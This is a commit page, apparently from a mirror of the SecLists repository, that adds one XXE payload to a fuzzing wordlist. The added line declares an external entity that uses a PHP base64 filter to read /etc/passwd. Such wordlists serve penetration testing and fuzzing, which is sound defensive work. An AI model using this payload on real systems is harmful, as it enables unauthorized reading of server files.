idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Close ##152 - PHP base64 filter file read (XXE_Fuzzing)

Browse Source
This commit is contained in:
g0tmi1k
2018-03-21 16:13:09 +00:00
parent 1863878864
commit 26cf832f9d
1 changed files with 1 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
Fuzzing/XXE-Fuzzing.txt
View File

@@ -1,3 +1,4 @@
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>